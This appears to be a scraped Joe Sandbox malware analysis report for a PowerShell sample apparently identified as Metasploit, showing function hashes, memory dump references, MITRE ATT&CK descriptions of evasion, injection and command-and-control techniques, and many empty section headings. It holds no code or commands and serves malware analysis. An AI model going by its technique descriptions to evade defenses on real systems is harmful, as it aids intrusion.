Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb95c3d89c640460735b135889647b220a84629021a94207b6a2b2c198c111f
Instruction ID: 23852a6660124ef2d640d6e61914990d604926c00d86697d1f03c53bb2dd0204
Opcode Fuzzy Hash: ffb95c3d89c640460735b135889647b220a84629021a94207b6a2b2c198c111f
Instruction Fuzzy Hash: B601677111CB0C4FD754EF0CE451AA6B7E0FB95364F10056EE58AC3651DB36E881CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C05FF8, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1348cea15d11d1ae0ad44fa6e092beb8a82dae37ade55f3aa31377b02ec0083
Instruction ID: 504727149a76689480600890590a5890612914e5b74032e183397ec6b87e66eb
Opcode Fuzzy Hash: f1348cea15d11d1ae0ad44fa6e092beb8a82dae37ade55f3aa31377b02ec0083
Instruction Fuzzy Hash: B2F0373275C6054FDB5CAA1CF8429B5B3D1EB95324B10417EE48FC2697D917E8428685

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C03298, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2c684e44b24b9eee9ae1592f1c264a332827050648c03a9c708d80a6033ae8b
Instruction ID: 058888fa956ac562dbec7f7617642fcb1a416235145ffc2a7c88131329a7c3b3
Opcode Fuzzy Hash: b2c684e44b24b9eee9ae1592f1c264a332827050648c03a9c708d80a6033ae8b
Instruction Fuzzy Hash: E2E0653275CA054FDB0CA61CF8439B4B3D1EB96720740053EE487C2656D927F8938AC5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C03B87, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c06a4e7b1db273428fa3cff220406cdbe53edb36d118bc62a655f087b1fe7ba6
Instruction ID: c8eaff2bf9e55907db9f667a355ab22b66fcfaf6eddf6e3ed5a7a02c7196d05c
Opcode Fuzzy Hash: c06a4e7b1db273428fa3cff220406cdbe53edb36d118bc62a655f087b1fe7ba6
Instruction Fuzzy Hash: B6E0393271C6090BE709AA2CB8428F977C1DB96360B50917EF44ACA657DC26A9838285

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35CD156B, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775247779.00007FFA35CD0000.00000040.00000001.sdmp, Offset: 00007FFA35CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb56f2615d8e1741ff3f69dccb4027cd89c08415c5314e131f56a507ddfcd25
Instruction ID: a476b6077ea90947b886a3f2ba7b6ba1ca78a79254ed2ba39c16ebd24e5bfa09
Opcode Fuzzy Hash: 4bb56f2615d8e1741ff3f69dccb4027cd89c08415c5314e131f56a507ddfcd25
Instruction Fuzzy Hash: 59B09212B0CC290AA5B4A26D38052B821C0C7D8A7070592F7E81DD2389E9084DE202D9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA35C01D70, Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a6a6ee59d4e4ba980c9969f2584f97b868bf4fe346d7d6fdb79130191aadf70
Instruction ID: c451d294eeb5acb796b55549dfc6404dcb6e2608320d12ffe94df62da2d41336
Opcode Fuzzy Hash: 4a6a6ee59d4e4ba980c9969f2584f97b868bf4fe346d7d6fdb79130191aadf70
Instruction Fuzzy Hash: 3EE1F332A0CB4B4FE729DB5CD4816B1F7D0EF56728B1485BAC48EC7596DE26E842C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C009BD, Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd39811719b4e9d030aa97105a2ff9ecce24d7181f53c1b1ba8fc62f2e835f45
Instruction ID: e191a8d6998923b59212975f2f6921dbbb8ca11423042a12d65fd56eb75d4f9d
Opcode Fuzzy Hash: dd39811719b4e9d030aa97105a2ff9ecce24d7181f53c1b1ba8fc62f2e835f45
Instruction Fuzzy Hash: 7041431790D2E34EE712B76DA8620E97FE0DF43724B1980B3D48DCA093DE4D684D9266

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C026AD, Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a105ca988891ccf1b0aa02c9733ab814a9165f58681be0679891b724b812a24
Instruction ID: d280779f3f4da1694c2a40f5b10ceb722843abaa245f890f3952eb1ada0caf3f
Opcode Fuzzy Hash: 4a105ca988891ccf1b0aa02c9733ab814a9165f58681be0679891b724b812a24
Instruction Fuzzy Hash: C7B15857A0D3E34FE712A77DE8A60E57FA0DF5362871940F7D0C8CB093EE09984A9265

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C0157F, Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db342bb31d3545bd768d8c3124d3e0c379e1e7241388900426099370f8f30400
Instruction ID: cafbc93695b491a600fc9905a936fc056e245420d49e3a26872636cca95c1974
Opcode Fuzzy Hash: db342bb31d3545bd768d8c3124d3e0c379e1e7241388900426099370f8f30400
Instruction Fuzzy Hash: 09B1875790D3D34EE312676DACA50F5BFA0DF43A2871940F3D0CD8B0D3EE0AA84A9655

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35CD0F91, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775247779.00007FFA35CD0000.00000040.00000001.sdmp, Offset: 00007FFA35CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63f812c36ad4573280d50ba206b81142360b9a609210838c63f40158430f2cf
Instruction ID: 08605838b645d26c648e38754121ce3d00789154d2fcd253738b07236ec9f012
Opcode Fuzzy Hash: d63f812c36ad4573280d50ba206b81142360b9a609210838c63f40158430f2cf
Instruction Fuzzy Hash: D501394694E7C20FE796936C08661A0AFE0AF23614B1A00FBD08DDB1E7E84D59558766

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report a.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Metasploit

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: powershell.exe PID: 7144 Parent PID: 3220